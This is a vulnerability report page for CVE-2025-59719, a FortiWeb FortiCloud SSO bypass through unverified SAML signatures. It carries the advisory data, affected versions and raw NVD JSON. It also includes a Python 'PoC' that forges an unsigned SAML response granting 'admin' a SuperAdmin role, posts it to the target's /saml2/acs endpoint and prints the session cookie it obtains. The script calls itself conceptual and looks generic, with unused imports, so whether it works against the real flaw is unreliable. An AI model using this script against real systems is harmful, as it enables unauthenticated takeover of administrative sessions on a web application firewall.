Security Vulnerability Report
中文
CVE-2025-59719 CVSS 9.8 CRITICAL

CVE-2025-59719

Published: 2025-12-09 18:15:55
Last Modified: 2025-12-09 19:59:30
Source: [email protected]

Description

An improper verification of cryptographic signature vulnerability in Fortinet FortiWeb 8.0.0, FortiWeb 7.6.0 through 7.6.4, FortiWeb 7.4.0 through 7.4.9 may allow an unauthenticated attacker to bypass the FortiCloud SSO login authentication via a crafted SAML response message.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fortinet:fortiweb:8.0.0:*:*:*:*:*:*:* - VULNERABLE
FortiWeb 8.0.0
FortiWeb 7.6.0 - 7.6.4
FortiWeb 7.4.0 - 7.4.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-59719 PoC - FortiWeb SAML Signature Bypass # This is a conceptual PoC demonstrating the attack vector import requests import base64 import zlib from defusedxml import ElementTree as ET TARGET_URL = "https://target-fortiweb:8443/" ATTACKER_CONTROLLED_USER = "admin" def create_malicious_saml_response(): """ Create a malicious SAML response with forged identity The vulnerability allows bypassing signature verification """ saml_response = f""" <samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"> <saml:Issuer>https://idp.example.com</saml:Issuer> <samlp:Status> <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/> </samlp:Status> <saml:Assertion> <saml:Subject> <saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified"> {ATTACKER_CONTROLLED_USER} </saml:NameID> </saml:Subject> <saml:Conditions NotBefore="2025-01-01T00:00:00Z" NotOnOrAfter="2026-01-01T00:00:00Z"/> <saml:AttributeStatement> <saml:Attribute Name="role"> <saml:AttributeValue>SuperAdmin</saml:AttributeValue> </saml:Attribute> </saml:AttributeStatement> </saml:Assertion> </samlp:Response> """ return base64.b64encode(saml_response.encode()).decode() def exploit_cve_2025_59719(): """ Exploit the improper signature verification vulnerability """ saml_response = create_malicious_saml_response() # Forge SAMLResponse parameter with malicious content exploit_data = { "SAMLResponse": saml_response, "RelayState": "/admin/dashboard" } # Send crafted request to bypass authentication target = TARGET_URL.rstrip('/') + "/saml2/acs" try: response = requests.post(target, data=exploit_data, verify=False, timeout=30) if response.status_code == 200 and "session" in response.cookies: print("[+] Authentication bypass successful!") print(f"[+] Session cookie obtained: {response.cookies.get('session')}") return response.cookies.get('session') else: print("[-] Exploitation failed or target not vulnerable") return None except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return None if __name__ == "__main__": print("CVE-2025-59719 FortiWeb SAML Signature Bypass PoC") print("=" * 60) exploit_cve_2025_59719()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59719", "sourceIdentifier": "[email protected]", "published": "2025-12-09T18:15:55.150", "lastModified": "2025-12-09T19:59:29.507", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An improper verification of cryptographic signature vulnerability in Fortinet FortiWeb 8.0.0, FortiWeb 7.6.0 through 7.6.4, FortiWeb 7.4.0 through 7.4.9 may allow an unauthenticated attacker to bypass the FortiCloud SSO login authentication via a crafted SAML response message."}, {"lang": "es", "value": "Una vulnerabilidad de verificación impropia de firma criptográfica en Fortinet FortiWeb 8.0.0, FortiWeb 7.6.0 hasta 7.6.4, FortiWeb 7.4.0 hasta 7.4.9 puede permitir a un atacante no autenticado eludir la autenticación de inicio de sesión de FortiCloud SSO a través de un mensaje de respuesta SAML manipulado."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-347"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.4.0", "versionEndIncluding": "7.4.9", "matchCriteriaId": "87CA4C4B-2701-4DEB-BB36-DBBFBD19D48A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndIncluding": "7.6.4", "matchCriteriaId": "8473958D-E679-4501-8D78-5350FA8FC1FC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiweb:8.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "6578F992-46E7-422C-A837-5A7F0E966AB6"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-647", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.